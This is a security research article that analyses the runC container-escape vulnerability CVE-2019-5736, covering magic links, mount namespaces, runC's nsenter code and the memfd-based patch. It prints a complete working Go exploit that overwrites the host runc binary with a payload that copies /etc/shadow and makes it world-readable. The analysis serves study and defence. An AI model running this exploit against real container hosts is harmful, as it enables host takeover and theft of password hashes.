Thoughts on Container Process Switching

Author: 時鐘@RainSec
This article was contributed by its author to Seebug Paper.

Background

Magic Link

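The /proc directory contains many link files, but Linux also has a special kind of link known as a magic link. A regular symbolic link has a size equal to the length of its target path, whereas a magic link reports a size of 0. The two also differ in how they are opened: for a regular symbolic link the kernel reads the stored target path and then opens that path, while for a magic link it calls a dedicated kernel handler that goes straight to the target file and returns a descriptor for it.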
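The size difference described above can be observed from user space. The following is a minimal sketch, assuming a Linux system with /proc mounted; the helper names lstatSize and regularLinkSize are made up for this illustration, and /etc/hostname is only used as a target string (it does not need to exist).

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// lstatSize returns the size that lstat(2) reports for the link itself,
// without following it.
func lstatSize(path string) (int64, error) {
	fi, err := os.Lstat(path)
	if err != nil {
		return 0, err
	}
	return fi.Size(), nil
}

// regularLinkSize creates a throwaway symbolic link pointing at target
// and returns the size lstat reports for that link.
func regularLinkSize(target string) (int64, error) {
	dir, err := os.MkdirTemp("", "linkdemo")
	if err != nil {
		return 0, err
	}
	defer os.RemoveAll(dir)

	link := filepath.Join(dir, "link")
	if err := os.Symlink(target, link); err != nil {
		return 0, err
	}
	return lstatSize(link)
}

func main() {
	target := "/etc/hostname" // illustrative target only
	regular, err := regularLinkSize(target)
	if err != nil {
		fmt.Println("regular link:", err)
		return
	}
	magic, err := lstatSize("/proc/self/exe")
	if err != nil {
		fmt.Println("magic link:", err)
		return
	}
	fmt.Printf("regular symlink size: %d (target length %d)\n", regular, len(target))
	fmt.Printf("/proc/self/exe size:  %d\n", magic)
}
```

On a typical Linux filesystem the first size matches the length of the target string, while the magic link reports 0.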

Anonymous Files

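Linux anonymous files behave much like regular files: they can be created, modified, written, and read. Unlike a regular file, however, an anonymous file has no on-disk backing. When a user creates one with memfd_create, the call returns a file descriptor, and once every reference to that file is dropped the anonymous file is destroyed. For its entire lifetime the file lives in RAM and never exists as a physical file.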

How is the mount namespace implemented?

First, note that the kernel's process structure, task_struct, has an nsproxy member:

    struct task_struct {
    .........
    /* Namespaces: */
    struct nsproxy          *nsproxy;
    .......
    }

The nsproxy structure looks like this:

struct nsproxy {
    atomic_t count;
    struct uts_namespace *uts_ns;
    struct ipc_namespace *ipc_ns;
    struct mnt_namespace *mnt_ns;
    struct pid_namespace *pid_ns_for_children;
    struct net       *net_ns;
    struct time_namespace *time_ns;
    struct time_namespace *time_ns_for_children;
    struct cgroup_namespace *cgroup_ns;
};

Each kind of namespace has its own structure. This article focuses on the mount namespace, so we trace how the kernel creates a process to see how the mount namespace is set up.

Kernel call chain:

kernel_clone(_do_fork) -> copy_process

copy_process contains a good deal of namespace-related logic:

static __latent_entropy struct task_struct *copy_process(
                    struct pid *pid,
                    int trace,
                    int node,
                    struct kernel_clone_args *args)
{
    int pidfd = -1, retval;
    struct task_struct *p;
    struct multiprocess_signals delayed;
    struct file *pidfile = NULL;
    u64 clone_flags = args->flags;
    struct nsproxy *nsp = current->nsproxy;

    /*
     * Don't allow sharing the root directory with processes in a different
     * namespace
     */
    if ((clone_flags & (CLONE_NEWNS|CLONE_FS)) == (CLONE_NEWNS|CLONE_FS))
        return ERR_PTR(-EINVAL);

    if ((clone_flags & (CLONE_NEWUSER|CLONE_FS)) == (CLONE_NEWUSER|CLONE_FS))
        return ERR_PTR(-EINVAL);
......
}
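The two flag checks quoted above can be mirrored in a few lines of Go to make the bit logic explicit. This is only an illustrative sketch, not kernel code: the constant values are the ones defined in the Linux UAPI header linux/sched.h, and the function names hasAll and rejectedByCopyProcess are invented for this example.

```go
package main

import "fmt"

// Flag values as defined in the Linux UAPI header <linux/sched.h>.
const (
	cloneFS      uint64 = 0x00000200
	cloneNewNS   uint64 = 0x00020000
	cloneNewUser uint64 = 0x10000000
)

// hasAll reports whether every bit in mask is set in flags.
func hasAll(flags, mask uint64) bool {
	return flags&mask == mask
}

// rejectedByCopyProcess mirrors the two checks shown above: a new mount
// namespace or a new user namespace cannot be combined with CLONE_FS,
// because the child would share fs information (root, cwd) with a
// process living in a different namespace.
func rejectedByCopyProcess(flags uint64) bool {
	return hasAll(flags, cloneNewNS|cloneFS) ||
		hasAll(flags, cloneNewUser|cloneFS)
}

func main() {
	fmt.Println(rejectedByCopyProcess(cloneNewNS | cloneFS)) // both bits set: rejected
	fmt.Println(rejectedByCopyProcess(cloneNewNS))           // new mount namespace alone: allowed
}
```

The comparison against the full mask (rather than a plain non-zero test) is what makes the check fire only when both flags are present at once.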

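This suggests that namespaces are handed down between processes through some form of inheritance, which naturally leads to process 0. The kernel defines init_task, which is initialized at the very start of boot, and its definition does initialize nsproxy: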

......
    .nsproxy    = &init_nsproxy,
......

init_nsproxy is defined as follows:

struct nsproxy init_nsproxy = {
    .count          = ATOMIC_INIT(1),
    .uts_ns         = &init_uts_ns,
#if defined(CONFIG_POSIX_MQUEUE) || defined(CONFIG_SYSVIPC)
    .ipc_ns         = &init_ipc_ns,
#endif
    .mnt_ns         = NULL,
    .pid_ns_for_children    = &init_pid_ns,
#ifdef CONFIG_NET
    .net_ns         = &init_net,
#endif
#ifdef CONFIG_CGROUPS
    .cgroup_ns      = &init_cgroup_ns,
#endif
#ifdef CONFIG_TIME_NS
    .time_ns        = &init_time_ns,
    .time_ns_for_children   = &init_time_ns,
#endif
};

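Note that mnt_ns is statically initialized to NULL, so the initial mount namespace does not come from init_nsproxy itself; it is filled in later during boot, once the root filesystem tree has been set up. Going back to copy_process, it calls copy_namespaces, which in turn calls create_new_namespaces. There, a new mnt_namespace is created through copy_mnt_ns when CLONE_NEWNS is requested; without that flag the child keeps sharing its parent's mount namespace. That covers the overall implementation and creation flow of mnt_namespace. copy_mnt_ns also shows what a mount namespace really is: an independent view of the filesystem with its own set of mount points. Anything that sidesteps that view therefore sidesteps the mount namespace, which is why symbolic link attacks have long been a pain point for containers.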
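Whether two processes share a mount namespace can be checked from user space through the /proc/<pid>/ns/mnt links, which are themselves magic links. The sketch below assumes Linux with /proc mounted; nsLink and sameNamespace are hypothetical helper names, and reading the links of another user's process (PID 1 here) may fail without sufficient privileges.

```go
package main

import (
	"fmt"
	"os"
)

// nsLink returns the target of /proc/<pid>/ns/<kind>, a string of the
// form "mnt:[<inode number>]" that identifies the namespace.
func nsLink(pid, kind string) (string, error) {
	return os.Readlink("/proc/" + pid + "/ns/" + kind)
}

// sameNamespace reports whether two processes are in the same namespace
// of the given kind by comparing the link targets.
func sameNamespace(pidA, pidB, kind string) (bool, error) {
	a, err := nsLink(pidA, kind)
	if err != nil {
		return false, err
	}
	b, err := nsLink(pidB, kind)
	if err != nil {
		return false, err
	}
	return a == b, nil
}

func main() {
	id, err := nsLink("self", "mnt")
	if err != nil {
		fmt.Println("cannot read own mount namespace:", err)
		return
	}
	fmt.Println("own mount namespace:", id)

	// Comparing against PID 1 usually needs privileges over that process.
	same, err := sameNamespace("self", "1", "mnt")
	if err != nil {
		fmt.Println("cannot compare with PID 1:", err)
		return
	}
	fmt.Println("shares mount namespace with PID 1:", same)
}
```

A process created without CLONE_NEWNS reports the same identifier as its parent, while a containerized process reports a different one from the host's init.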

The runC nsenter module

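While reading the runC source I came across the nsenter module. Most of this module is written in C, and it is pulled in only through the import list of init.go, so its code runs very early.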

package nsenter

/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import "C"

A comment placed immediately before import "C" is special cgo syntax: everything inside the comment is treated as C code.

Vulnerability Analysis

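Whether a user runs docker run or docker exec, the command they asked for is ultimately executed by runC. The runC source shows that both runc run and runc exec follow the same core pattern: build a runner struct, then call its run() method: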

func execProcess(context *cli.Context) (int, error) {
    container, err := getContainer(context)
    if err != nil {
        return -1, err
    }
    status, err := container.Status()
    if err != nil {
        return -1, err
    }
    if status == libcontainer.Stopped {
        return -1, errors.New("cannot exec in a stopped container")
    }
    if status == libcontainer.Paused && !context.Bool("ignore-paused") {
        return -1, errors.New("cannot exec in a paused container (use --ignore-paused to override)")
    }
    path := context.String("process")
    if path == "" && len(context.Args()) == 1 {
        return -1, errors.New("process args cannot be empty")
    }
    state, err := container.State()
    if err != nil {
        return -1, err
    }
    bundle := utils.SearchLabels(state.Config.Labels, "bundle")
    p, err := getProcess(context, bundle)
    if err != nil {
        return -1, err
    }

    cgPaths, err := getSubCgroupPaths(context.StringSlice("cgroup"))
    if err != nil {
        return -1, err
    }

    r := &runner{
        enableSubreaper: false,
        shouldDestroy:   false,
        container:       container,
        consoleSocket:   context.String("console-socket"),
        detach:          context.Bool("detach"),
        pidFile:         context.String("pid-file"),
        action:          CT_ACT_RUN,
        init:            false,
        preserveFDs:     context.Int("preserve-fds"),
        subCgroupPaths:  cgPaths,
    }
    return r.run(p)
}

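Before that, though, both paths call loadFactory to create the underlying libcontainer factory used to interact with the container. In exec.go, one important job of getContainer is to create this libcontainer instance: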

// loadFactory returns the configured factory instance for execing containers.
func loadFactory(context *cli.Context) (libcontainer.Factory, error) {
    root := context.GlobalString("root")
    abs, err := filepath.Abs(root)
    if err != nil {
        return nil, err
    }

    intelRdtManager := libcontainer.IntelRdtFs

    // We resolve the paths for {newuidmap,newgidmap} from the context of runc,
    // to avoid doing a path lookup in the nsexec context. TODO: The binary
    // names are not currently configurable.
    newuidmap, err := exec.LookPath("newuidmap")
    if err != nil {
        newuidmap = ""
    }
    newgidmap, err := exec.LookPath("newgidmap")
    if err != nil {
        newgidmap = ""
    }

    return libcontainer.New(abs, intelRdtManager,
        libcontainer.CriuPath(context.GlobalString("criu")),
        libcontainer.NewuidmapPath(newuidmap),
        libcontainer.NewgidmapPath(newgidmap))
}

The New function called at the end shows that runC stores a magic link as InitPath:

// New returns a linux based container factory based in the root directory and
// configures the factory with the provided option funcs.
func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
    if root != "" {
        if err := os.MkdirAll(root, 0o700); err != nil {
            return nil, err
        }
    }
    l := &LinuxFactory{
        Root:      root,
        InitPath:  "/proc/self/exe",
        InitArgs:  []string{os.Args[0], "init"},
        Validator: validate.New(),
        CriuPath:  "criu",
    }

    for _, opt := range options {
        if opt == nil {
            continue
        }
        if err := opt(l); err != nil {
            return nil, err
        }
    }
    return l, nil
}
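The combination of InitPath set to /proc/self/exe and InitArgs ending in init amounts to a self re-exec. The following is a sketch of that general pattern using only the Go standard library; it is not runC's actual command-building code, and newInitCmd is a name invented for this example.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
)

// newInitCmd builds a command that re-executes the current binary
// through the /proc/self/exe magic link, passing "init" as its only
// argument. argv[0] is kept as the original program name, similar to
// what the InitArgs field above describes.
func newInitCmd() *exec.Cmd {
	cmd := exec.Command("/proc/self/exe", "init")
	cmd.Args[0] = os.Args[0]
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	return cmd
}

func main() {
	// Child branch: we were started by the re-exec below.
	if len(os.Args) > 1 && os.Args[1] == "init" {
		fmt.Println("child: running as init, pid", os.Getpid())
		return
	}
	// Parent branch: start a copy of ourselves in "init" mode.
	if err := newInitCmd().Run(); err != nil {
		fmt.Println("re-exec failed:", err)
	}
}
```

Because the path is the magic link rather than a filesystem path, the child is started from whatever file the parent is currently executing, regardless of where that file sits in the parent's view of the filesystem.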

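Later on, runC invokes this InitPath with init as the argument, which amounts to running the runc init command. That command imports the C-language nsenter package through cgo to set up the namespaces: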

package main

import (
    "os"
    "runtime"
    "strconv"

    "github.com/opencontainers/runc/libcontainer"
    _ "github.com/opencontainers/runc/libcontainer/nsenter"
    "github.com/sirupsen/logrus"
)
......

The nsenter package is as follows:

package nsenter

/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import "C"

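It calls nsexec(), which runs before the Go runtime starts. Its main job is to parse the netlink-formatted configuration sent earlier by the parent process, set up the user namespace, and create a child process. The child then sets up the remaining namespaces and creates a grandchild so that those namespaces take effect; this grandchild is the init process inside the container. Looking back over this sequence: runC starts a child process through cmd.Start() to run runc init, and while the nsenter package of runc init executes, the process first places itself in the user namespace and PID namespace. As a result, processes already running inside the container can see the runC process during this window. The relevant code: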

void nsexec(void)
{
    int pipenum;
    jmp_buf env;
    int syncpipe[2];
    struct nlconfig_t config = {0};

    /*
     * If we don't have an init pipe, just return to the go routine.
     * We'll only get an init pipe for start or exec.
     */
    pipenum = initpipe();
    if (pipenum == -1)
        return;

    /* Parse all of the netlink configuration. */
    nl_parse(pipenum, &config);

    /* clone(2) flags are mandatory. */
    if (config.cloneflags == -1)
        bail("missing clone_flags");

    /* Pipe so we can tell the child when we've finished setting up. */
    if (pipe(syncpipe) < 0)
        bail("failed to setup sync pipe between parent and child");

    /* Set up the jump point. */
    if (setjmp(env) == JUMP_VAL) {
        /*
         * We're inside the child now, having jumped from the
         * start_child() code after forking in the parent.
         */
        uint8_t s = 0;
        int consolefd = config.consolefd;

        /* Close the writing side of pipe. */
        close(syncpipe[1]);

        /* Sync with parent. */
        if (read(syncpipe[0], &s, sizeof(s)) != sizeof(s) || s != SYNC_VAL)
            bail("failed to read sync byte from parent");

        if (setsid() < 0)
            bail("setsid failed");

        if (setuid(0) < 0)
            bail("setuid failed");

        if (setgid(0) < 0)
            bail("setgid failed");

        if (setgroups(0, NULL) < 0)
            bail("setgroups failed");

        if (consolefd != -1) {
            if (ioctl(consolefd, TIOCSCTTY, 0) < 0)
                bail("ioctl TIOCSCTTY failed");
            if (dup3(consolefd, STDIN_FILENO, 0) != STDIN_FILENO)
                bail("failed to dup stdin");
            if (dup3(consolefd, STDOUT_FILENO, 0) != STDOUT_FILENO)
                bail("failed to dup stdout");
            if (dup3(consolefd, STDERR_FILENO, 0) != STDERR_FILENO)
                bail("failed to dup stderr");
        }

        /* Free netlink data. */
        nl_free(&config);

        /* Finish executing, let the Go runtime take over. */
        return;
    }

    /* Run the parent code. */
    start_child(pipenum, &env, syncpipe, &config);

    /* Should never be reached. */
    bail("should never be reached");
}

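If a process inside the container can observe the runc process through /proc while runc is still starting up, it can reach the runc binary through /proc/runc-pid/exe. This exe file is a magic link, so opening it goes through the kernel's dedicated handler instead of looking up a target path the way a regular symbolic link would. That effectively bypasses the restrictions the mount namespace and chroot place on the filesystem resources visible to the container.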

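This lets us overwrite the original runc binary with malicious code. The next time the user runs a command that invokes runc, such as docker exec or docker run, our file may be executed instead, giving code execution on the host and thus a container escape.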

PoC

package main

// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
        "fmt"
        "io/ioutil"
        "os"
        "strconv"
        "strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"

func main() {
        // First we overwrite /bin/sh with the /proc/self/exe interpreter path
        fd, err := os.Create("/bin/sh")
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Fprintln(fd, "#!/proc/self/exe")
        err = fd.Close()
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Println("[+] Overwritten /bin/sh successfully")

        // Loop through all processes to find one whose cmdline includes runcinit
        // This will be the process created by runc
        var found int
        for found == 0 {
                pids, err := ioutil.ReadDir("/proc")
                if err != nil {
                        fmt.Println(err)
                        return
                }
                for _, f := range pids {
                        fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
                        fstring := string(fbytes)
                        if strings.Contains(fstring, "runc") {
                                fmt.Println("[+] Found the PID:", f.Name())
                                found, err = strconv.Atoi(f.Name())
                                if err != nil {
                                        fmt.Println(err)
                                        return
                                }
                        }
                }
        }

        // We will use the pid to get a file handle for runc on the host.
        var handleFd = -1
        for handleFd == -1 {
                // Note, you do not need to use the O_PATH flag for the exploit to work.
                handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
                if int(handle.Fd()) > 0 {
                        handleFd = int(handle.Fd())
                }
        }
        fmt.Println("[+] Successfully got the file handle")

        // Now that we have the file handle, lets write to the runc binary and overwrite it
        // It will maintain it's executable flag
        for {
                writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
                if int(writeHandle.Fd()) > 0 {
                        fmt.Println("[+] Successfully got write handle", writeHandle)
                        writeHandle.Write([]byte(payload))
                        return
                }
        }
}

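How the PoC works:

1. Overwrite /bin/sh in the container with #!/proc/self/exe.
2. Walk the directories under /proc to find the runC process.
3. Open that process's exe file under /proc to obtain an fd.
4. Keep trying to write through the fd until runC releases the binary and the write succeeds.
5. Finally, runc executes the /bin/sh that the user requested through docker exec. Its content was replaced with #!/proc/self/exe in step 1, so what actually runs is runc on the host, which we already overwrote in step 4.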
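The retry loop in step 4 exists because Linux normally refuses to open a file for writing while it is being executed, returning ETXTBSY. The sketch below probes that behaviour harmlessly against the running program itself; it assumes Linux, never writes any data, and uses the invented names isTextBusy and probeRunningBinary. The exact answer depends on the kernel version and on file permissions, so no particular result is guaranteed.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"syscall"
)

// isTextBusy reports whether err is (or wraps) ETXTBSY, the error the
// kernel returns when a file that is currently being executed is
// opened for writing.
func isTextBusy(err error) bool {
	return errors.Is(err, syscall.ETXTBSY)
}

// probeRunningBinary tries to open the currently running executable for
// writing and reports how the kernel answered. It opens without O_TRUNC
// and closes immediately, so the binary is never modified.
func probeRunningBinary() string {
	f, err := os.OpenFile("/proc/self/exe", os.O_WRONLY, 0)
	switch {
	case err == nil:
		f.Close()
		return "opened"
	case isTextBusy(err):
		return "busy"
	default:
		return "error: " + err.Error()
	}
}

func main() {
	fmt.Println("write-open of the running binary:", probeRunningBinary())
}
```

In the PoC the same refusal is what keeps the write-open failing until the runc process exits, at which point the loop's next attempt goes through.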

The Patch

Patch details: https://github.com/opencontainers/runc/commit/6635b4f0c6af3810594d2770f662f34ddc15b40d

void nsexec(void)
{
    int pipenum;
    ......
    if (pipenum == -1)
        return;

    /*
     * We need to re-exec if we are not in a cloned binary. This is necessary
     * to ensure that containers won't be able to access the host binary
     * through /proc/self/exe. See CVE-2019-5736.
     */
    if (ensure_cloned_binary() < 0)
        bail("could not ensure we are a cloned binary");

    /* Parse all of the netlink configuration. */
    nl_parse(pipenum, &config);

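The main change is the added call to ensure_cloned_binary(). Its core logic uses memfd_create so that, before doing anything inside the container, runc first copies itself into an anonymous file and re-executes from that copy. The behavior is otherwise unchanged, but /proc/self/exe can no longer reach the original runC binary.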
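One way to observe the effect of this patch from the outside is to look at where a process's exe link points: a file created with memfd_create shows up as a target beginning with /memfd:. The sketch below is only a user-space heuristic under that assumption and is not how runC itself verifies the cloned binary; isMemfdTarget and exeIsMemfd are hypothetical names.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// isMemfdTarget reports whether a readlink result names a memfd-backed
// file. The kernel renders such files as "/memfd:<name> (deleted)".
func isMemfdTarget(target string) bool {
	return strings.HasPrefix(target, "/memfd:")
}

// exeIsMemfd inspects /proc/<pid>/exe and reports whether the process
// appears to be running from an anonymous in-memory copy.
func exeIsMemfd(pid string) (bool, error) {
	target, err := os.Readlink("/proc/" + pid + "/exe")
	if err != nil {
		return false, err
	}
	return isMemfdTarget(target), nil
}

func main() {
	fromMemfd, err := exeIsMemfd("self")
	if err != nil {
		fmt.Println("cannot inspect /proc/self/exe:", err)
		return
	}
	fmt.Println("running from a memfd copy:", fromMemfd)
}
```

For an ordinary program started from disk this reports false; a process re-executed from an anonymous copy would report true, and writes through its exe link would land on the throwaway copy instead of the host binary.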

Reflections

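To control containers effectively, the host inevitably has to switch processes across the container boundary. With the slightest carelessness, though, container-side state ends up being carried along in the process context. This runC vulnerability is one example. The docker cp vulnerability is another: there, the docker-tar process carried shared-library content from the container over to the host, which led to a container escape. When thinking about container security, monitoring these risky processes is therefore essential as well.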

This article is published by Seebug Paper. Please credit the source when reprinting. Article URL: http://www.bjnorthway.com/1856/
